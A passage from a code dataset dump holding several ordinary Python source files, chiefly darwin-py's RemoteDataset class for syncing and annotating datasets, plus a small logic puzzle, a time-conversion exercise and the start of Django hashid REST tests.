fluid.io.load_params(\n executor=self.fluid_executor,\n dirname=save_path,\n main_program=program,\n filename=filename)\n","repo_name":"PaddlePaddle/PARL","sub_path":"parl/core/fluid/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":10204,"program_lang":"python","lang":"en","doc_type":"code","stars":3097,"dataset":"github-code","pt":"50"} +{"seq_id":"13959288122","text":"import os\nimport shutil\nimport tempfile\nimport zipfile\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Sequence,\n Tuple,\n Union,\n)\n\nimport orjson as json\nfrom rich.console import Console\n\nfrom darwin.dataset.download_manager import download_all_images_from_annotations\nfrom darwin.dataset.identifier import DatasetIdentifier\nfrom darwin.dataset.release import Release\nfrom darwin.dataset.split_manager import split_dataset\nfrom darwin.dataset.upload_manager import (\n FileUploadCallback,\n LocalFile,\n ProgressCallback,\n UploadHandler,\n)\nfrom darwin.dataset.utils import (\n exhaust_generator,\n get_annotations,\n get_classes,\n is_unix_like_os,\n make_class_lists,\n)\nfrom darwin.datatypes import AnnotationClass, AnnotationFile, ItemId, PathLike, Team\nfrom darwin.exceptions import MissingDependency, NotFound, UnsupportedExportFormat\nfrom darwin.exporter.formats.darwin import build_image_annotation\nfrom darwin.item import DatasetItem\nfrom darwin.item_sorter import ItemSorter\nfrom darwin.utils import parse_darwin_json, split_video_annotation, urljoin\n\nif TYPE_CHECKING:\n from darwin.client import Client\n\nfrom abc import ABC, abstractmethod\n\n\nclass RemoteDataset(ABC):\n \"\"\"\n Manages the remote and local versions of a dataset hosted on Darwin.\n It allows several dataset management operations such as syncing between\n remote and local, pulling a remote dataset, removing the local files, ...\n\n Parameters\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the datasets as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-case, removed specials characters and\n spaces are replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n\n Attributes\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the datasets as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-case, removed specials characters and\n spaces are replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n \"\"\"\n\n def __init__(\n self,\n *,\n client: \"Client\",\n team: str,\n name: str,\n slug: str,\n dataset_id: int,\n item_count: int = 0,\n progress: float = 0,\n version: int = 1,\n release: Optional[str] = None,\n ):\n self.team = team\n self.name = name\n self.slug = slug or name\n self.dataset_id = dataset_id\n self.item_count = item_count\n self.progress = progress\n self.client = client\n self.annotation_types: Optional[List[Dict[str, Any]]] = None\n self.console: Console = Console()\n self.version = version\n self.release = release\n\n @abstractmethod\n def push(\n self,\n files_to_upload: Optional[Sequence[Union[PathLike, LocalFile]]],\n *,\n blocking: bool = True,\n multi_threaded: bool = True,\n max_workers: Optional[int] = None,\n fps: int = 0,\n as_frames: bool = False,\n extract_views: bool = False,\n files_to_exclude: Optional[List[PathLike]] = None,\n path: Optional[str] = None,\n preserve_folders: bool = False,\n progress_callback: Optional[ProgressCallback] = None,\n file_upload_callback: Optional[FileUploadCallback] = None,\n ) -> UploadHandler:\n pass\n\n def split_video_annotations(self, release_name: str = \"latest\") -> None:\n \"\"\"\n Splits the video annotations from this ``RemoteDataset`` using the given release.\n\n Parameters\n ----------\n release_name : str, default: \"latest\"\n The name of the release to use.\n \"\"\"\n release_dir: Path = self.local_path / \"releases\" / release_name\n annotations_path: Path = release_dir / \"annotations\"\n\n for count, annotation_file in enumerate(annotations_path.glob(\"*.json\")):\n darwin_annotation: Optional[AnnotationFile] = parse_darwin_json(\n annotation_file, count\n )\n if not darwin_annotation or not darwin_annotation.is_video:\n continue\n\n frame_annotations = split_video_annotation(darwin_annotation)\n for frame_annotation in frame_annotations:\n annotation = build_image_annotation(frame_annotation)\n\n video_frame_annotations_path = annotations_path / annotation_file.stem\n video_frame_annotations_path.mkdir(exist_ok=True, parents=True)\n\n stem = Path(frame_annotation.filename).stem\n output_path = video_frame_annotations_path / f\"{stem}.json\"\n with output_path.open(\"w\") as f:\n op = json.dumps(annotation).decode(\"utf-8\")\n f.write(op)\n\n # Finally delete video annotations\n annotation_file.unlink()\n\n # Update class list, which is used when loading local annotations in a dataset\n make_class_lists(release_dir)\n\n def pull(\n self,\n *,\n release: Optional[Release] = None,\n blocking: bool = True,\n multi_threaded: bool = True,\n only_annotations: bool = False,\n force_replace: bool = False,\n remove_extra: bool = False,\n subset_filter_annotations_function: Optional[Callable] = None,\n subset_folder_name: Optional[str] = None,\n use_folders: bool = False,\n video_frames: bool = False,\n force_slots: bool = False,\n ignore_slots: bool = False,\n ) -> Tuple[Optional[Callable[[], Iterator[Any]]], int]:\n \"\"\"\n Downloads a remote dataset (images and annotations) to the datasets directory.\n\n Parameters\n ----------\n release: Optional[Release], default: None\n The release to pull.\n blocking : bool, default: True\n If False, the dataset is not downloaded and a generator function is returned instead.\n multi_threaded : bool, default: True\n Uses multiprocessing to download the dataset in parallel. If blocking is False this has no effect.\n only_annotations : bool, default: False\n Download only the annotations and no corresponding images.\n force_replace : bool, default: False\n Forces the re-download of an existing image.\n remove_extra : bool, default: False\n Removes existing images for which there is not corresponding annotation.\n subset_filter_annotations_function: Optional[Callable], default: None\n This function receives the directory where the annotations are downloaded and can\n perform any operation on them i.e. filtering them with custom rules or else.\n If it needs to receive other parameters is advised to use functools.partial() for it.\n subset_folder_name: Optional[str], default: None\n Name of the folder with the subset of the dataset. If not provided a timestamp is used.\n use_folders : bool, default: False\n Recreates folders from the dataset.\n video_frames : bool, default: False\n Pulls video frames images instead of video files.\n force_slots: bool\n Pulls all slots of items into deeper file structure ({prefix}/{item_name}/{slot_name}/{file_name})\n\n Returns\n -------\n generator : function\n Generator for doing the actual downloads. This is None if blocking is ``True``.\n count : int\n The number of files.\n\n Raises\n ------\n UnsupportedExportFormat\n If the given ``release`` has an invalid format.\n ValueError\n If darwin in unable to get ``Team`` configuration.\n \"\"\"\n\n console = self.console or Console()\n\n if release is None:\n release = self.get_release()\n\n if release.format != \"json\" and release.format != \"darwin_json_2\":\n raise UnsupportedExportFormat(release.format)\n\n release_dir = self.local_releases_path / release.name\n release_dir.mkdir(parents=True, exist_ok=True)\n\n with tempfile.TemporaryDirectory() as tmp_dir_str:\n tmp_dir = Path(tmp_dir_str)\n # Download the release from Darwin\n zip_file_path = release.download_zip(tmp_dir / \"dataset.zip\")\n with zipfile.ZipFile(zip_file_path) as z:\n # Extract annotations\n z.extractall(tmp_dir)\n # If a filtering function is provided, apply it\n if subset_filter_annotations_function is not None:\n subset_filter_annotations_function(tmp_dir)\n if subset_folder_name is None:\n subset_folder_name = datetime.now().strftime(\n \"%m/%d/%Y_%H:%M:%S\"\n )\n annotations_dir: Path = (\n release_dir / (subset_folder_name or \"\") / \"annotations\"\n )\n # Remove existing annotations if necessary\n if annotations_dir.exists():\n try:\n shutil.rmtree(annotations_dir)\n except PermissionError:\n print(\n f\"Could not remove dataset in {annotations_dir}. Permission denied.\"\n )\n annotations_dir.mkdir(parents=True, exist_ok=False)\n stems: dict = {}\n\n # Move the annotations into the right folder and rename them to have the image\n # original filename as contained in the json\n for annotation_path in tmp_dir.glob(\"*.json\"):\n annotation = parse_darwin_json(annotation_path, count=None)\n if annotation is None:\n continue\n\n if video_frames and any(\n not slot.frame_urls for slot in annotation.slots\n ):\n # will raise if not installed via pip install darwin-py[ocv]\n try:\n from cv2 import (\n VideoCapture, # pylint: disable=import-outside-toplevel\n )\n except ImportError as e:\n raise MissingDependency(\n \"Missing Dependency: OpenCV required for Video Extraction. Install with `pip install darwin-py\\[ocv]`\"\n ) from e\n filename = Path(annotation.filename).stem\n if filename in stems:\n stems[filename] += 1\n filename = f\"{filename}_{stems[filename]}\"\n else:\n stems[filename] = 1\n\n destination_name = (\n annotations_dir / f\"{filename}{annotation_path.suffix}\"\n )\n shutil.move(str(annotation_path), str(destination_name))\n\n # Extract the list of classes and create the text files\n make_class_lists(release_dir)\n\n if release.latest and is_unix_like_os():\n try:\n latest_dir: Path = self.local_releases_path / \"latest\"\n if latest_dir.is_symlink():\n latest_dir.unlink()\n\n target_link: Path = self.local_releases_path / release_dir.name\n latest_dir.symlink_to(target_link)\n except OSError:\n self.console.log(\n f\"Could not mark release {release.name} as latest. Continuing...\"\n )\n\n if only_annotations:\n # No images will be downloaded\n return None, 0\n\n team_config: Optional[Team] = self.client.config.get_team(self.team)\n if not team_config:\n raise ValueError(\"Unable to get Team configuration.\")\n\n api_key = team_config.api_key\n\n # Create the generator with the download instructions\n progress, count = download_all_images_from_annotations(\n api_key=api_key,\n api_url=self.client.url,\n annotations_path=annotations_dir,\n images_path=self.local_images_path,\n force_replace=force_replace,\n remove_extra=remove_extra,\n use_folders=use_folders,\n video_frames=video_frames,\n force_slots=force_slots,\n ignore_slots=ignore_slots,\n )\n if count == 0:\n return None, count\n\n # If blocking is selected, download the dataset on the file system\n if blocking:\n max_workers = None\n env_max_workers = os.getenv(\"DARWIN_DOWNLOAD_FILES_CONCURRENCY\")\n if env_max_workers and int(env_max_workers) > 0:\n max_workers = int(env_max_workers)\n\n console.print(\n f\"Going to download {str(count)} files to {self.local_images_path.as_posix()} .\"\n )\n successes, errors = exhaust_generator(\n progress=progress(),\n count=count,\n multi_threaded=multi_threaded,\n worker_count=max_workers,\n )\n if errors:\n self.console.print(\n f\"Encountered errors downloading {len(errors)} files\"\n )\n for error in errors:\n self.console.print(f\"\\t - {error}\")\n\n downloaded_file_count = len(\n [\n f\n for f in self.local_images_path.rglob(\"*\")\n if f.is_file() and not f.name.startswith(\".\")\n ]\n )\n\n console.print(\n f\"Total file count after download completed {str(downloaded_file_count)}.\"\n )\n\n return None, count\n else:\n return progress, count\n\n def remove_remote(self) -> None:\n \"\"\"Archives (soft-deletion) this ``RemoteDataset``.\"\"\"\n self.client.archive_remote_dataset(self.dataset_id, self.team)\n\n @abstractmethod\n def fetch_remote_files(\n self,\n filters: Optional[Dict[str, Union[str, List[str]]]] = None,\n sort: Optional[Union[str, ItemSorter]] = None,\n ) -> Iterator[DatasetItem]:\n \"\"\"\n Fetch and lists all files on the remote dataset.\n\n Parameters\n ----------\n filters : Optional[Dict[str, Union[str, List[str]]]], default: None\n The filters to use. Files excluded by the filter won't be fetched.\n sort : Optional[Union[str, ItemSorter]], default: None\n A sorting direction. It can be a string with the values 'asc', 'ascending', 'desc',\n 'descending' or an ``ItemSorter`` instance.\n\n Yields\n -------\n Iterator[DatasetItem]\n An iterator of ``DatasetItem``.\n \"\"\"\n\n @abstractmethod\n def archive(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Archives (soft-deletion) the given ``DatasetItem``\\\\s belonging to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be archived.\n \"\"\"\n\n @abstractmethod\n def restore_archived(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Restores the archived ``DatasetItem``\\\\s that belong to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be restored.\n \"\"\"\n\n @abstractmethod\n def move_to_new(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Changes the given ``DatasetItem``\\\\s status to ``new``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s whose status will change.\n \"\"\"\n\n @abstractmethod\n def reset(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Resets the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be reset.\n \"\"\"\n\n @abstractmethod\n def complete(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Completes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be completed.\n \"\"\"\n\n @abstractmethod\n def delete_items(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Deletes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be deleted.\n \"\"\"\n\n def fetch_annotation_type_id_for_name(self, name: str) -> Optional[int]:\n \"\"\"\n Fetches annotation type id for a annotation type name, such as ``bounding_box``.\n\n Parameters\n ----------\n name: str\n The name of the annotation we want the id for.\n\n\n Returns\n -------\n Optional[int]\n The id of the annotation type or ``None`` if it doesn't exist.\n \"\"\"\n if not self.annotation_types:\n self.annotation_types = self.client.annotation_types()\n\n for annotation_type in self.annotation_types:\n if annotation_type[\"name\"] == name:\n return annotation_type[\"id\"]\n\n return None\n\n def create_annotation_class(\n self, name: str, type: str, subtypes: List[str] = []\n ) -> Dict[str, Any]:\n \"\"\"\n Creates an annotation class for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str\n The name of the annotation class.\n type : str\n The type of the annotation class.\n subtypes : List[str], default: []\n Annotation class subtypes.\n\n Returns\n -------\n Dict[str, Any]\n Dictionary with the server response.\n\n Raises\n ------\n ValueError\n If a given annotation type or subtype is unknown.\n \"\"\"\n\n type_ids: List[int] = []\n for annotation_type in [type] + subtypes:\n type_id: Optional[int] = self.fetch_annotation_type_id_for_name(\n annotation_type\n )\n if not type_id and self.annotation_types is not None:\n list_of_annotation_types = \", \".join(\n [type[\"name\"] for type in self.annotation_types]\n )\n raise ValueError(\n f\"Unknown annotation type: '{annotation_type}', valid values: {list_of_annotation_types}\"\n )\n\n if type_id is not None:\n type_ids.append(type_id)\n\n return self.client.create_annotation_class(self.dataset_id, type_ids, name)\n\n def add_annotation_class(\n self, annotation_class: Union[AnnotationClass, int]\n ) -> Optional[Dict[str, Any]]:\n \"\"\"\n Adds an annotation class to this ``RemoteDataset``.\n\n Parameters\n ----------\n annotation_class : Union[AnnotationClass, int]\n The annotation class to add or its id.\n\n Returns\n -------\n Optional[Dict[str, Any]]\n Dictionary with the server response or ``None`` if the annotations class already\n exists.\n\n Raises\n ------\n ValueError\n If the given ``annotation_class`` does not exist in this ``RemoteDataset``'s team.\n \"\"\"\n # Waiting for a better api for setting classes\n # in the meantime this will do\n all_classes: List[Dict[str, Any]] = self.fetch_remote_classes(True)\n\n if isinstance(annotation_class, int):\n match = [cls for cls in all_classes if cls[\"id\"] == annotation_class]\n if not match:\n raise ValueError(\n f\"Annotation class id: `{annotation_class}` does not exist in Team.\"\n )\n else:\n annotation_class_type = (\n annotation_class.annotation_internal_type\n or annotation_class.annotation_type\n )\n match = [\n cls\n for cls in all_classes\n if cls[\"name\"] == annotation_class.name\n and annotation_class_type in cls[\"annotation_types\"]\n ]\n if not match:\n # We do not expect to reach here; as pervious logic divides annotation classes in imports\n # between `in team` and `new to platform`\n raise ValueError(\n f\"Annotation class name: `{annotation_class.name}`, type: `{annotation_class_type}`; does not exist in Team.\"\n )\n\n datasets = match[0][\"datasets\"]\n # check that we are not already part of the dataset\n for dataset in datasets:\n if dataset[\"id\"] == self.dataset_id:\n return None\n datasets.append({\"id\": self.dataset_id})\n # we typecast to dictionary because we are not passing the raw=True parameter.\n class_id = match[0][\"id\"]\n payload = {\"datasets\": datasets, \"id\": class_id}\n return self.client.update_annotation_class(class_id, payload)\n\n def fetch_remote_classes(self, team_wide=False) -> List[Dict[str, Any]]:\n \"\"\"\n Fetches all the Annotation Classes from this ``RemoteDataset``.\n\n Parameters\n ----------\n team_wide : bool, default: False\n If ``True`` will return all Annotation Classes that belong to the team. If ``False``\n will only return Annotation Classes which have been added to the dataset.\n\n Returns\n -------\n List[Dict[str, Any]]:\n List of Annotation Classes (can be empty).\n \"\"\"\n all_classes: List[Dict[str, Any]] = self.client.fetch_remote_classes()\n\n classes_to_return = []\n for cls in all_classes:\n belongs_to_current_dataset = any(\n dataset[\"id\"] == self.dataset_id for dataset in cls[\"datasets\"]\n )\n cls[\"available\"] = belongs_to_current_dataset\n if team_wide or belongs_to_current_dataset:\n classes_to_return.append(cls)\n return classes_to_return\n\n def fetch_remote_attributes(self) -> List[Dict[str, Any]]:\n \"\"\"\n Fetches all remote attributes on the remote dataset.\n\n Returns\n -------\n List[Dict[str, Any]]\n A List with the attributes, where each attribute is a dictionary.\n \"\"\"\n return self.client.fetch_remote_attributes(self.dataset_id)\n\n @abstractmethod\n def export(\n self,\n name: str,\n annotation_class_ids: Optional[List[str]] = None,\n include_url_token: bool = False,\n include_authorship: bool = False,\n version: Optional[str] = None,\n ) -> None:\n \"\"\"\n Create a new release for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str\n Name of the release.\n annotation_class_ids : Optional[List[str]], default: None\n List of the classes to filter.\n include_url_token : bool, default: False\n Should the image url in the export include a token enabling access without team\n membership or not?\n include_authorship : bool, default: False\n If set, include annotator and reviewer metadata for each annotation.\n version : Optional[str], default: None, enum: [\"1.0\", \"2.0\"]\n When used for V2 dataset, allows to force generation of either Darwin JSON 1.0 (Legacy) or newer 2.0.\n Omit this option to get your team's default.\n \"\"\"\n\n @abstractmethod\n def get_report(self, granularity: str = \"day\") -> str:\n \"\"\"\n Returns a String representation of a CSV report for this ``RemoteDataset``.\n\n Parameters\n ----------\n granularity : str, default: \"day\"\n The granularity of the report, can be 'day', 'week' or 'month'.\n\n Returns\n -------\n str\n A CSV report.\n \"\"\"\n\n @abstractmethod\n def get_releases(self) -> List[\"Release\"]:\n \"\"\"\n Get a sorted list of releases with the most recent first.\n\n Returns\n -------\n List[\"Release\"]\n Returns a sorted list of available ``Release``\\\\s with the most recent first.\n \"\"\"\n\n def get_release(self, name: str = \"latest\") -> \"Release\":\n \"\"\"\n Get a specific ``Release`` for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str, default: \"latest\"\n Name of the export.\n\n Returns\n -------\n Release\n The selected release.\n\n Raises\n ------\n NotFound\n The selected ``Release`` does not exist.\n \"\"\"\n releases = self.get_releases()\n if not releases:\n raise NotFound(str(self.identifier))\n\n # overwrite default name with stored dataset.release if supplied\n if self.release and name == \"latest\":\n name = self.release\n elif name == \"latest\":\n return next((release for release in releases if release.latest))\n\n for release in releases:\n if str(release.name) == name:\n return release\n raise NotFound(str(self.identifier))\n\n def split(\n self,\n val_percentage: float = 0.1,\n test_percentage: float = 0,\n split_seed: int = 0,\n make_default_split: bool = True,\n release_name: Optional[str] = None,\n ) -> None:\n \"\"\"\n Creates lists of file names for each split for train, validation, and test.\n Note: This functions needs a local copy of the dataset.\n\n Parameters\n ----------\n val_percentage : float, default: 0.1\n Percentage of images used in the validation set.\n test_percentage : float, default: 0\n Percentage of images used in the test set.\n split_seed : int, default: 0\n Fix seed for random split creation.\n make_default_split: bool, default: True\n Makes this split the default split.\n release_name: Optional[str], default: None\n Version of the dataset.\n\n Raises\n ------\n NotFound\n If this ``RemoteDataset`` is not found locally.\n \"\"\"\n if not self.local_path.exists():\n raise NotFound(\n \"Local dataset not found: the split is performed on the local copy of the dataset. \\\n Pull the dataset from Darwin first using pull()\"\n )\n if release_name in [\"latest\", None]:\n release = self.get_release(\"latest\")\n release_name = release.name\n\n split_dataset(\n self.local_path,\n release_name=release_name,\n val_percentage=val_percentage,\n test_percentage=test_percentage,\n split_seed=split_seed,\n make_default_split=make_default_split,\n )\n\n def classes(\n self, annotation_type: str, release_name: Optional[str] = None\n ) -> List[str]:\n \"\"\"\n Returns the list of ``class_type`` classes.\n\n Parameters\n ----------\n annotation_type : str\n The type of annotation classes, e.g. 'tag' or 'polygon'.\n release_name: Optional[str], default: None\n Version of the dataset.\n\n\n Returns\n -------\n classes: List[str]\n List of classes in the dataset of type ``class_type``.\n \"\"\"\n assert self.local_path.exists()\n if release_name in [\"latest\", None]:\n release = self.get_release(\"latest\")\n release_name = release.name\n\n return get_classes(\n self.local_path, release_name=release_name, annotation_type=annotation_type\n )\n\n def annotations(\n self,\n partition: str,\n split: str = \"split\",\n split_type: str = \"stratified\",\n annotation_type: str = \"polygon\",\n release_name: Optional[str] = None,\n annotation_format: Optional[str] = \"darwin\",\n ) -> Iterable[Dict[str, Any]]:\n \"\"\"\n Returns all the annotations of a given split and partition in a single dictionary.\n\n Parameters\n ----------\n partition : str\n Selects one of the partitions [train, val, test].\n split : str, default: \"split\"\n Selects the split that defines the percentages used (use 'split' to select the default split.\n split_type : str, default: \"stratified\"\n Heuristic used to do the split [random, stratified].\n annotation_type : str, default: \"polygon\"\n The type of annotation classes [tag, polygon].\n release_name : Optional[str], default: None\n Version of the dataset.\n annotation_format : Optional[str], default: \"darwin\"\n Re-formatting of the annotation when loaded [coco, darwin].\n\n Yields\n -------\n Dict[str, Any]\n Dictionary representing an annotation from this ``RemoteDataset``.\n \"\"\"\n assert self.local_path.exists()\n if release_name in [\"latest\", None]:\n release = self.get_release(\"latest\")\n release_name = release.name\n\n for annotation in get_annotations(\n self.local_path,\n partition=partition,\n split=split,\n split_type=split_type,\n annotation_type=annotation_type,\n release_name=release_name,\n annotation_format=annotation_format,\n ):\n yield annotation\n\n @abstractmethod\n def workview_url_for_item(self, item: DatasetItem) -> str:\n \"\"\"\n Returns the darwin URL for the given ``DatasetItem``.\n\n Parameters\n ----------\n item : DatasetItem\n The ``DatasetItem`` for which we want the url.\n\n Returns\n -------\n str\n The url.\n \"\"\"\n\n @abstractmethod\n def post_comment(\n self, item: DatasetItem, text: str, x: float, y: float, w: float, h: float\n ) -> None:\n \"\"\"\n Adds a comment to an item in this dataset. The comment will be added with a bounding box.\n Creates the workflow for said item if necessary.\n\n Parameters\n ----------\n item : DatasetItem\n The ``DatasetItem`` which will receive the comment.\n text : str\n The text of the comment.\n x : float\n The x coordinate of the bounding box containing the comment.\n y : float\n The y coordinate of the bounding box containing the comment.\n w : float\n The width of the bounding box containing the comment.\n h : float\n The height of the bounding box containing the comment.\n \"\"\"\n\n @abstractmethod\n def import_annotation(self, item_id: ItemId, payload: Dict[str, Any]) -> None:\n \"\"\"\n Imports the annotation for the item with the given id.\n\n Parameters\n ----------\n item_id: ItemId\n Identifier of the Item that we are import the annotation to.\n payload: Dict[str, Any]\n A dictionary with the annotation to import. The default format is:\n `{\"annotations\": serialized_annotations, \"overwrite\": \"false\"}`\n \"\"\"\n ...\n\n @property\n def remote_path(self) -> Path:\n \"\"\"Returns an URL specifying the location of the remote dataset.\"\"\"\n return Path(urljoin(self.client.base_url, f\"/datasets/{self.dataset_id}\"))\n\n @property\n def local_path(self) -> Path:\n \"\"\"Returns a Path to the local dataset.\"\"\"\n datasets_dir: str = self.client.get_datasets_dir(self.team)\n\n if self.slug:\n return Path(datasets_dir) / self.team / self.slug\n else:\n return Path(datasets_dir) / self.team\n\n @property\n def local_releases_path(self) -> Path:\n \"\"\"Returns a Path to the local dataset releases.\"\"\"\n return self.local_path / \"releases\"\n\n @property\n def local_images_path(self) -> Path:\n \"\"\"Returns a local Path to the images folder.\"\"\"\n return self.local_path / \"images\"\n\n @property\n def identifier(self) -> DatasetIdentifier:\n \"\"\"The ``DatasetIdentifier`` of this ``RemoteDataset``.\"\"\"\n return DatasetIdentifier(team_slug=self.team, dataset_slug=self.slug)\n","repo_name":"v7labs/darwin-py","sub_path":"darwin/dataset/remote_dataset.py","file_name":"remote_dataset.py","file_ext":"py","file_size_in_byte":33669,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"50"} +{"seq_id":"72869531676","text":"from logic import *\n\npeople = [\"Gilderoy\", \"Pomona\", \"Minerva\", \"Horace\"]\nhouses = [\"Gryffondor\", \"Poufssoufle\", \"Serpentard\", \"Serdaigle\"]\n\nsymbols = []\n\nknowledge = And()\n\nfor person in people:\n for house in houses:\n symbols.append(Symbol(f\"{person}{house}\"))\n\nfor person in people:\n knowledge.add(Or(\n Symbol(f\"{person}Gryffondor\"),\n Symbol(f\"{person}Poufssoufle\"),\n Symbol(f\"{person}Serpentard\"),\n Symbol(f\"{person}Serdaigle\")\n ))\n\n # Each person belongs to a house\nfor person in people:\n for h1 in houses:\n for h2 in houses:\n if h1 != h2:\n knowledge.add(\n Implication(Symbol(f\"{person}{h1}\"), Not(Symbol(f\"{person}{h2}\")))\n ) \n\n\n# Each house have one person\nfor house in houses:\n for p1 in people:\n for p2 in people:\n if p1 != p2:\n knowledge.add(\n Implication(Symbol(f\"{p1}{house}\"), Not(Symbol(f\"{p2}{house}\")))\n )\n\nknowledge.add(\n Or(Symbol(\"GilderoyGryffondor\"),Symbol(\"GilderoySerdaigle\"))\n)\nknowledge.add(Not(Symbol(\"PomonaSerpentard\")))\nknowledge.add((Symbol(\"MinervaGryffondor\")))\n\n\nfor symbol in symbols:\n if model_check(knowledge,symbol):\n print(symbol)\n\n","repo_name":"hugomtr/CS50X-AI","sub_path":"Knowledge/knights/harry.py","file_name":"harry.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28401879291","text":"\"\"\"pscp\"\"\"\r\ndef main():\r\n \"\"\"pscp\"\"\"\r\n sec = int(input())\r\n minu, sec = sec//60, sec%60\r\n hour, minu = minu//60, minu%60\r\n day, hour = hour//24, hour%24\r\n if day >= 10000:\r\n print(\"ERR_:__:__:__\")\r\n else:\r\n print(\"%04d:%02d:%02d:%02d\"%(day, hour, minu, sec))\r\nmain()\r\n","repo_name":"bess11234/pscp65","sub_path":"16 September 2022/Timing II.py","file_name":"Timing II.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"18263323166","text":"from unittest import skipUnless\n\nfrom django.core import exceptions\nfrom django.test import TestCase\n\nfrom tests.models import Artist, Record, Track\nimport hashids\n\ntry:\n from rest_framework.exceptions import ErrorDetail\n from rest_framework import serializers\n from rest_framework.renderers import JSONRenderer\n from hashid_field.rest import UnconfiguredHashidSerialField, HashidSerializerCharField, HashidSerializerIntegerField\n\n have_drf = True\nexcept ImportError:\n have_drf = False\n\n\n@skipUnless(have_drf, \"Requires Django REST Framework to be installed\")\nclass TestRestFramework(TestCase):\n def assertSerializerError(self, serializer, field, code):\n serializer_name = serializer.__class__.__name__\n self.assertFalse(serializer.is_valid(),\n msg=\"The serializer {} does not contain any errors\".format(serializer_name))\n\n def assertCodeInErrors(errors):\n found_error = False\n for error_detail in errors:\n if error_detail.code == code:\n found_error = True\n self.assertTrue(found_error,\n msg=\"The field '{} in serializer '{}' does not contain the error code {}\".format(\n field, serializer_name, code))\n\n if field:\n if field in serializer.errors:\n assertCodeInErrors(serializer.errors[field])\n else:\n self.fail(\"The field '{}' in serializer '{}' contains no errors\".format(field, serializer_name))\n else:\n if 'non_field_errors' in serializer.errors:\n assertCodeInErrors(serializer.errors['non_field_errors'])\n else:\n self.fail(\"The serializer '{}' does not contain the non-field error {}\".format(serializer_name, code))\n\n def test_default_modelserializer_field(self):\n class ArtistSerializer(serializers.ModelSerializer):\n class Meta:\n model = Artist\n fields = ('id', 'name')\n\n with self.assertRaises(exceptions.ImproperlyConfigured):\n ArtistSerializer().fields() # Fields aren't built until first accessed\n\n def test_modelserializer_charfield(self):\n class ArtistSerializer(serializers.ModelSerializer):\n id = HashidSerializerCharField(source_field='tests.Artist.id')\n\n class Meta:\n model = Artist\n fields = ('id', 'name')\n\n artist = Artist.objects.create(id=128, name=\"Test Artist\")\n orig_id = artist.id\n s = ArtistSerializer(artist)\n self.assertEqual(Artist._meta.get_field('id').salt, s.fields['id'].hashid_salt)\n self.assertTrue(isinstance(s.data['id'], str))\n self.assertEqual(artist.id.hashid, s.data['id'])\n s2 = ArtistSerializer(artist, data={'id': artist.id.hashid, 'name': \"Test Artist Changed\"})\n self.assertTrue(s2.is_valid())\n artist = s2.save()\n self.assertEqual(artist.id, orig_id)\n self.assertEqual(artist.name, \"Test Artist Changed\")\n\n def test_modelserializer_integerfield(self):\n class ArtistSerializer(serializers.ModelSerializer):\n id = HashidSerializerIntegerField(source_field=Artist._meta.get_field('id'))\n\n class Meta:\n model = Artist\n fields = ('id', 'name')\n\n artist = Artist.objects.create(id=256, name=\"Test Artist\")\n orig_id = artist.id\n s = ArtistSerializer(artist)\n self.assertTrue(isinstance(s.data['id'], int))\n self.assertEqual(artist.id.id, s.data['id'])\n s2 = ArtistSerializer(artist, data={'id': 256, 'name': \"Test Artist Changed\"})\n self.assertTrue(s2.is_valid())\n artist = s2.save()\n self.assertEqual(artist.id, orig_id)\n self.assertEqual(artist.name, \"Test Artist Changed\")\n\n def test_int_lookups_on_char_field(self):\n class RecordSerializer(serializers.ModelSerializer):\n id = HashidSerializerCharField(source_field='tests.Record.id')\n artist = serializers.PrimaryKeyRelatedField(\n pk_field=HashidSerializerCharField(source_field='tests.Artist.id'),\n queryset=Artist.objects.all(),\n required=False)\n reference_id = HashidSerializerCharField(source_field='tests.Record.reference_id')\n\n class Meta:\n model = Record\n fields = ('id', 'name', 'artist', 'reference_id')\n\n artist = Artist.objects.create(id=512, name=\"Test Artist 512\")\n reference_id = Record._meta.get_field('reference_id').get_hashid(1111111)\n\n # Make sure int lookups of a related field are not allowed on HashidSerializerCharField\n record_id = 